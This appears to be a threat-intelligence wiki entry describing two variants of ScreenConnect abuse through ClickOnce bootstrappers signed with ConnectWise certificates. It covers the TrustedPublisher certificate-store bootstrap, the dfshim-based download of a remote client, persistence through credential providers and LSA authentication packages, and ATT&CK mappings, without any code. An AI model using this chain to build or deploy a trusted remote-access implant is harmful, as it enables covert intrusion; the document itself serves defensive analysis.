ConnectWise (ScreenConnect) abuse
Abuse of the legitimate ConnectWise ScreenConnect remote-access platform via malicious ClickOnce bootstrapper binaries signed with stolen or compromised ConnectWise Authenticode certificates.
Overview
ConnectWise ScreenConnect is a legitimate enterprise remote-access and remote-support platform. Attackers have been observed distributing custom ClickOnce runner executables signed with ConnectWise's own code-signing certificate. These binaries do not contain the full RAT — instead they perform a certificate-trust bootstrap (installing the publisher cert into the TrustedPublisher store) and then silently invoke dfshim.dll to download and install a remote ScreenConnect client from an attacker-controlled IP. The result is a fully trusted, signed remote-access session that bypasses SmartScreen and user-consent dialogs.
First observed sample: 7145e8 (Nov 2022 build, full MSI bundle via OpenCTI / abuse.ch). Second observed variant: 81adbf9a (Apr 2025 build, ClickOnce bootstrapper). The attacker evolved from full self-contained installer to minimal network-staged bootstrapper over ~2.5 years.
Build-stack typically observed
Two deployment morphs observed:
Variant A — MSI bundle (7145e8, Nov 2022):
- Compiler: MSVC 14.33 (Visual Studio 2019/2022) ^[raw/analyses/7145e8/report.md]
- Language: C/C++ native wrapper bootstrapping embedded .NET 2.0 assemblies (CIL)
- Linker flags:
/DYNAMICBASE,/NXCOMPAT - Signing: Valid Authenticode by ConnectWise, LLC (DigiCert chain) ^[raw/analyses/7145e8/report.md]
- PDB leak:
C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb - Deployment: Self-contained PE32 with embedded ScreenConnect assemblies in
.rsrc, loaded viamscoree!CorBindToRuntimeEx; MSI payload installs services, credential providers, and LSA auth packages.
Variant B — ClickOnce bootstrapper (81adbf9a, Apr 2025):
- Compiler: MSVC 14.40 (Visual Studio 2022) ^[raw/analyses/81adbf9a/report.md]
- Language: C/C++ (no .NET runtime)
- Linker flags:
/DYNAMICBASE,/NXCOMPAT, CastGuard enabled - Signing: Valid Authenticode by ConnectWise, LLC (DigiCert chain) ^[raw/analyses/81adbf9a/report.md]
- PDB leak:
C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb - No packing, no obfuscation, no anti-debug. The evasion is entirely in the valid signature and the legitimate tool chain.
Deploy / TTPs typically observed
| Technique | MITRE ID | Evidence | |
|---|---|---|---|
| Install root / publisher certificate | T1553.004 | CertOpenSystemStoreA("TrustedPublisher"), CertAddCertificateContextToStore ^[raw/analyses/81adbf9a/report.md] |
|
| Remote access software abuse | T1219 | Hard-coded ScreenConnect C2 endpoint, embedded client assemblies ^[raw/analyses/7145e8/report.md] | |
| Ingress tool transfer | T1105 | Embedded MSI with Cabinet archives installing ScreenConnect from .rsrc ^[raw/analyses/7145e8/report.md] |
|
| Create or Modify System Process (Windows Service) | T1543.003 | MSI ServiceInstall table + SafeBoot\Network persistence ^[raw/analyses/7145e8/report.md] |
|
| OS Credential Dumping: LSASS Memory | T1003.001 | LSA Authentication Package registration (ScreenConnect.WindowsAuthenticationPackage.dll) ^[raw/analyses/7145e8/report.md] |
|
| Input Capture: Credential API Hooking | T1056.001 | Windows Credential Provider DLL (ScreenConnect.WindowsCredentialProvider.dll) ^[raw/analyses/7145e8/report.md] |
|
| Boot or Logon Autostart Execution | T1547.012 | Credential provider registration at install time ^[raw/analyses/7145e8/report.md] | |
| Valid Accounts (code-signing abuse) | T1078 | Authenticode by ConnectWise, LLC ^[raw/analyses/7145e8/report.md] | |
| Application-layer C2 | T1071.001 | HTTP (delegated to dfshim in Variant B; direct via ScreenConnect client in Variant A) ^[raw/analyses/81adbf9a/report.md] | |
| User execution | T1204.002 | Malicious .application execution flow (Variant B) ^[raw/analyses/81adbf9a/report.md] |
Capabilities
authenticode-trust-bootstrap-trustedpublisherclickonce-deployment-dfshim-shopenver applicationwremote-access-software-stagingcertificate-store-manipulation-crypt32http-c2-clickonce-manifestno-direct-socket-api-delegated-httpvalid-legitimate-certificate-masquerademsi-bundle-self-extracting-installerdotnet-runtime-corbindtoruntimeexembedded-assembly-rcdata-resource-loadingservice-install-safeboot-persistencelsa-authentication-package-injectionwindows-credential-provider-registrationhardcoded-c2-appconfig
Variants / Aliases
connectwise(OpenCTI label)ScreenConnect(product name used in C2 URL)ClickOnceRunner(PDB / internal build name)
Notable analyses
- raw/analyses/7145e8299053/report.md — Self-contained MSI bundle, full ScreenConnect client installer with embedded .NET assemblies, hardcoded C2, LSA authentication package, and credential provider registration. MSVC 14.33, Nov 2022 build.
- raw/analyses/81adbf9a/report.md — Authenticode-backed ClickOnce runner, static-only deep-dive with YARA + Sigma rules. MSVC 14.40, Apr 2025 build.
Related entities / concepts
- clickonce-certificate-trust-bootstrap — Specific technique page for the certificate → ClickOnce deployment chain
- legitimate-remote-access-tool-abuse — Cross-family concept page covering abuse of legitimate remote-access tools
- netsupport-inno-dropper — Another legitimate remote-access tool (NetSupport Manager) abused via installer repackaging